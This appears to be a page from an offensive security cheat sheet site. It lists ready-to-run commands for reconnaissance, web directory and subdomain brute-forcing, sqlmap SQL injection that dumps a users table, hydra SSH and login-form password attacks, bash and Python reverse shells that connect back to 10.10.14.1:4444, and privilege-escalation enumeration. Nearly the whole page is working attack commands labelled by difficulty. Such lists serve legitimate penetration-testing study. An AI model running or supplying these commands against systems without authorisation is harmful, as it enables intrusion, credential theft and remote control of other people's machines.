
MITRE tactic: Reconnaissance

Offensive Beginner Free

Full port scan with service/version detection and default scripts on a subnet

nmap -sV -sC -p- --open -T4 192.168.1.0/24
nmap recon port-scan network enumeration
Nmap / Reconnaissance
Offensive Intermediate Free

Combined TCP SYN and UDP scan on common ports

nmap -sU -sS -p U:53,111,137,T:21-25,80,139,8080 192.168.1.1
nmap udp tcp stealth recon
Nmap / Reconnaissance
Offensive Intermediate Free

Run vulnerability detection NSE scripts against common service ports

nmap --script vuln -sV -p 80,443,22,21 <target>
nmap nse vulnerability cve web
Nmap / Reconnaissance
Offensive Beginner Free

Directory and file brute-force enumeration against a web server

gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -x php,html,txt -t 50
gobuster web enumeration directory fuzzing
Gobuster / Enumeration
Offensive Intermediate Free

Virtual host (subdomain) enumeration via HTTP Host header fuzzing

gobuster vhost -u http://target.com -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 30
gobuster vhost subdomain web enumeration
Gobuster / Enumeration
Offensive Intermediate Premium

Automated SQL injection discovery and database enumeration

sqlmap -u "http://target.com/page?id=1" --dbs --batch --level=3 --risk=2
sqlmap sql-injection web database exploitation
SQLMap / Web Hacking
Offensive Advanced Premium

POST-based SQL injection with credential dump from specific table

sqlmap -u "http://target.com/login" --data="user=admin&pass=test" --method POST -D webapp_db -T users --dump
sqlmap post credentials dump sqli
SQLMap / Web Hacking
Offensive Beginner Premium

SSH brute-force attack against a single username with rockyou wordlist

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100 -t 4 -V
hydra brute-force ssh password credentials
Hydra / Password Attacks
Offensive Intermediate Premium

HTTP POST form brute-force with custom failure string detection

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt <target> http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid credentials" -t 30
hydra web post brute-force login
Hydra / Password Attacks
Offensive Beginner Premium

Start a Netcat listener to receive an incoming reverse shell connection

nc -lvnp 4444
netcat nc listener reverse-shell post-exploitation
Netcat / Reverse Shells
Offensive Beginner Premium

Bash TCP reverse shell one-liner — executes on the target to connect back

bash -i >& /dev/tcp/10.10.14.1/4444 0>&1
bash reverse-shell rce tcp payload
Netcat / Reverse Shells
Offensive Intermediate Premium

Python3 reverse shell one-liner for targets with Python installed

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.1",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'
python reverse-shell socket payload
Netcat / Reverse Shells
Offensive Intermediate Premium

Find all SUID binaries on the system for privilege escalation opportunities

find / -perm -4000 -type f 2>/dev/null
suid privesc gtfobins linux post-exploitation
Linux CLI / Privilege Escalation
Offensive Beginner Premium

List commands the current user can run with sudo — key privesc enumeration step

sudo -l
sudo privesc gtfobins linux enumeration
Linux CLI / Privilege Escalation
Offensive Beginner Free

OSINT email, subdomain, and employee enumeration from multiple sources

theHarvester -d target.com -b google,bing,linkedin,github -l 500
osint recon email subdomain passive
TheHarvester / OSINT